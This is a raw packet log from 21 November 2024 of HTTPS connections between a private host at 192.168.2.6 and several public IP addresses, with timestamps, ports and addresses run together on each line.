                                                                                                                                                                              Nov 21, 2024 08:31:02.107970953 CET49865443192.168.2.64.175.87.197
                                                                                                                                                                              Nov 21, 2024 08:31:02.108006001 CET443498654.175.87.197192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.108097076 CET49865443192.168.2.64.175.87.197
                                                                                                                                                                              Nov 21, 2024 08:31:02.108445883 CET49865443192.168.2.64.175.87.197
                                                                                                                                                                              Nov 21, 2024 08:31:02.108460903 CET443498654.175.87.197192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.114571095 CET4434985813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.115143061 CET49858443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.115197897 CET4434985813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.115662098 CET49858443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.115674973 CET4434985813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.136910915 CET4434986013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.137557983 CET49860443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.137578011 CET4434986013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.138556957 CET49860443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.138562918 CET4434986013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.571727991 CET4434986113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.572686911 CET4434985813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.574532032 CET4434986113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.574585915 CET49861443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.574594975 CET4434986113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.574640989 CET49861443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.575812101 CET4434985813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.575910091 CET49858443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.576785088 CET49861443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.576802969 CET4434986113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.576814890 CET49861443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.576819897 CET4434986113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.576901913 CET49858443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.576920033 CET4434985813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.576941967 CET49858443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.576948881 CET4434985813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.579819918 CET49872443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.579863071 CET4434987213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.579890966 CET49873443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.579926968 CET49872443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.579935074 CET4434987313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.579982042 CET49873443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.580070972 CET49872443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.580082893 CET4434987213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.580218077 CET49873443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.580231905 CET4434987313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.589344978 CET4434986013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.597156048 CET4434986013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.597218037 CET49860443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.597291946 CET49860443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.597305059 CET4434986013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.597398996 CET49860443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.597405910 CET4434986013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.601095915 CET49874443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.601123095 CET4434987413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.601181030 CET49874443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.601342916 CET49874443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.601355076 CET4434987413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:03.385732889 CET4434986313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:03.395982027 CET49863443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:03.396028996 CET4434986313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:03.396337986 CET49863443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:03.396343946 CET4434986313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:03.436999083 CET4434986413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:03.464550972 CET49864443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:03.464597940 CET4434986413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:03.465028048 CET49864443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:03.465034962 CET4434986413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:03.828846931 CET4434986313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:03.831912041 CET4434986313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:03.832066059 CET49863443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:03.879957914 CET4434986413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:03.883040905 CET4434986413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:03.883119106 CET49864443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:03.932682991 CET443498654.175.87.197192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:03.932755947 CET49865443192.168.2.64.175.87.197
                                                                                                                                                                              Nov 21, 2024 08:31:04.300046921 CET4434987313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.342669010 CET49873443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.380987883 CET4434987413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.424124956 CET4434987213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.428225994 CET49874443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.468517065 CET49872443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.547702074 CET49872443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.547717094 CET4434987213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.548274040 CET49872443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.548280001 CET4434987213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.548521042 CET49874443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.548527956 CET4434987413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.548878908 CET49874443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.548883915 CET4434987413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.549103022 CET49873443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.549135923 CET4434987313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.549442053 CET49873443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.549454927 CET4434987313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.549599886 CET49863443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.549617052 CET4434986313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.549626112 CET49863443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.549632072 CET4434986313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.586226940 CET49864443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.586256981 CET4434986413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.586271048 CET49864443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.586277962 CET4434986413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.591043949 CET49865443192.168.2.64.175.87.197
                                                                                                                                                                              Nov 21, 2024 08:31:04.591069937 CET443498654.175.87.197192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.591331959 CET443498654.175.87.197192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.605081081 CET49865443192.168.2.64.175.87.197
                                                                                                                                                                              Nov 21, 2024 08:31:04.625382900 CET49880443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.625415087 CET4434988013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.625477076 CET49880443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.627083063 CET49881443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.627111912 CET4434988113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.627168894 CET49881443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.627649069 CET49880443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.627659082 CET4434988013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.628870010 CET49881443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.628885031 CET4434988113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.647341013 CET443498654.175.87.197192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.785284996 CET49883443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:31:04.785324097 CET4434988340.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.785379887 CET49883443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:31:04.786509037 CET49883443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:31:04.786525965 CET4434988340.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.864373922 CET4434987313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.867276907 CET4434987313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.867333889 CET49873443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.867347002 CET4434987313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.867363930 CET4434987313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.867413044 CET49873443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.867475986 CET49873443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.867491007 CET4434987313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.867505074 CET49873443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.867511034 CET4434987313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.875005960 CET4434987413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.875267982 CET49884443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.875323057 CET4434988413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.875386000 CET49884443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.876224995 CET49884443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.876243114 CET4434988413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.878123999 CET4434987413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.878181934 CET49874443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.878216982 CET49874443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.878233910 CET4434987413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.881128073 CET49885443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.881150961 CET4434988513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.881268978 CET49885443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.881431103 CET49885443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.881443024 CET4434988513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.881683111 CET4434987213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.884840965 CET4434987213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.884903908 CET49872443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.890789032 CET49872443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.890789032 CET49872443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.890806913 CET4434987213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.890819073 CET4434987213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.895123959 CET49886443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.895163059 CET4434988613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:04.895216942 CET49886443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.895394087 CET49886443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:04.895420074 CET4434988613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:05.206320047 CET443498654.175.87.197192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:05.206382990 CET443498654.175.87.197192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:05.206427097 CET443498654.175.87.197192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:05.206460953 CET49865443192.168.2.64.175.87.197
                                                                                                                                                                              Nov 21, 2024 08:31:05.206491947 CET443498654.175.87.197192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:05.206511021 CET49865443192.168.2.64.175.87.197
                                                                                                                                                                              Nov 21, 2024 08:31:05.206537008 CET49865443192.168.2.64.175.87.197
                                                                                                                                                                              Nov 21, 2024 08:31:05.240777016 CET443498654.175.87.197192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:05.240828991 CET443498654.175.87.197192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:05.240866899 CET49865443192.168.2.64.175.87.197
                                                                                                                                                                              Nov 21, 2024 08:31:05.240889072 CET443498654.175.87.197192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:05.240911007 CET49865443192.168.2.64.175.87.197
                                                                                                                                                                              Nov 21, 2024 08:31:05.241003036 CET49865443192.168.2.64.175.87.197
                                                                                                                                                                              Nov 21, 2024 08:31:05.241014004 CET443498654.175.87.197192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:05.241031885 CET443498654.175.87.197192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:05.241045952 CET49865443192.168.2.64.175.87.197
                                                                                                                                                                              Nov 21, 2024 08:31:05.241061926 CET443498654.175.87.197192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.420434952 CET4434988013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.421039104 CET49880443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:06.421078920 CET4434988013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.421535969 CET49880443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:06.421540976 CET4434988013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.485435009 CET4434988113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.492881060 CET49881443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:06.492929935 CET4434988113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.493366957 CET49881443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:06.493381977 CET4434988113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.594732046 CET4434988513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.595402956 CET49885443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:06.595418930 CET4434988513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.595902920 CET49885443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:06.595907927 CET4434988513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.610224962 CET4434988340.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.610332012 CET49883443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:31:06.612699032 CET49883443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:31:06.612715006 CET4434988340.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.613549948 CET4434988340.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.615351915 CET49883443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:31:06.615528107 CET49883443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:31:06.615536928 CET4434988340.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.615710974 CET49883443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:31:06.659362078 CET4434988340.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.695920944 CET4434988613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.697338104 CET49886443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:06.697364092 CET4434988613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.706185102 CET49886443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:06.706192017 CET4434988613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.720417976 CET4434988413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.721260071 CET49884443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:06.721273899 CET4434988413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.721899033 CET49884443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:06.721903086 CET4434988413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.866144896 CET4434988013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.869267941 CET4434988013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.869321108 CET49880443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:06.869328022 CET4434988013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.869376898 CET49880443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:06.869442940 CET49880443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:06.869462013 CET4434988013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.869472980 CET49880443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:06.869478941 CET4434988013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.880187988 CET49894443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:06.880229950 CET4434989413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.881328106 CET49894443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:06.883451939 CET49894443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:06.883465052 CET4434989413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.936453104 CET4434988113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.939637899 CET4434988113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:06.941657066 CET49881443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.021238089 CET49881443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.021311045 CET4434988113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.021375895 CET49881443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.021395922 CET4434988113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.026443958 CET49895443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.026484013 CET4434989513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.026551008 CET49895443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.026806116 CET49895443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.026824951 CET4434989513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.028135061 CET4434988513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.031534910 CET4434988513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.035530090 CET49885443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.041205883 CET49885443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.041205883 CET49885443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.041232109 CET4434988513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.041244030 CET4434988513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.134116888 CET4434988340.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.134221077 CET4434988340.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.134311914 CET49883443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:31:07.143001080 CET4434988613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.144635916 CET4434988613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.144692898 CET4434988613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.144747019 CET49886443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.165626049 CET49883443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:31:07.165662050 CET4434988340.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.173511028 CET4434988413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.176671982 CET4434988413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.179387093 CET49884443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.263902903 CET49886443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.263926983 CET4434988613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.263938904 CET49886443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.263947010 CET4434988613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.264765978 CET49884443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.264770985 CET4434988413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.264789104 CET49884443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.264792919 CET4434988413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.273989916 CET49896443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.274025917 CET4434989613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.274082899 CET49896443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.274848938 CET49897443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.274905920 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.274961948 CET49897443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.275753975 CET49898443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.275763988 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.275814056 CET49898443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.276371956 CET49896443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.276384115 CET4434989613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.276591063 CET49897443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.276606083 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:07.276721954 CET49898443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:07.276734114 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:08.600207090 CET4434989413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:08.600729942 CET49894443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:08.600758076 CET4434989413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:08.601413965 CET49894443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:08.601418972 CET4434989413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:08.873537064 CET4434989513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:08.874094009 CET49895443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:08.874116898 CET4434989513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:08.874553919 CET49895443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:08.874558926 CET4434989513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:08.989346027 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:08.989885092 CET49897443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:08.989952087 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:08.990144014 CET4434989613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:08.990356922 CET49897443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:08.990370989 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:08.990578890 CET49896443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:08.990614891 CET4434989613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:08.990911961 CET49896443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:08.990919113 CET4434989613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.008110046 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.008443117 CET49898443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.008466959 CET4434989813.107.246.45192.168.2.6
